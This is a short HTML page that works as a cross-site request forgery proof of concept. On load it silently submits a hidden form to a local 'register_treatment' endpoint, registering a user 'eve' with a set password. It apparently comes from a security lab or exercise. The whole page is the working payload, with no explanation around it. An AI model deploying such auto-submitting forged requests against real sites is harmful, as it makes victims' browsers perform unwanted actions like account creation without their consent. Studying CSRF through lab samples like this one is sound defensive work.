<html>
<body>
    <form name='csrf' action='http://localhost:8000/register_treatment' method='post'>
        <input type='hidden' name='name' value='eve' />
        <input type='hidden' name='pwd' value='evepwd' />
    </form>

    <script type='text/javascript'>
        document.csrf.submit();
    </script>
</body>
</html>
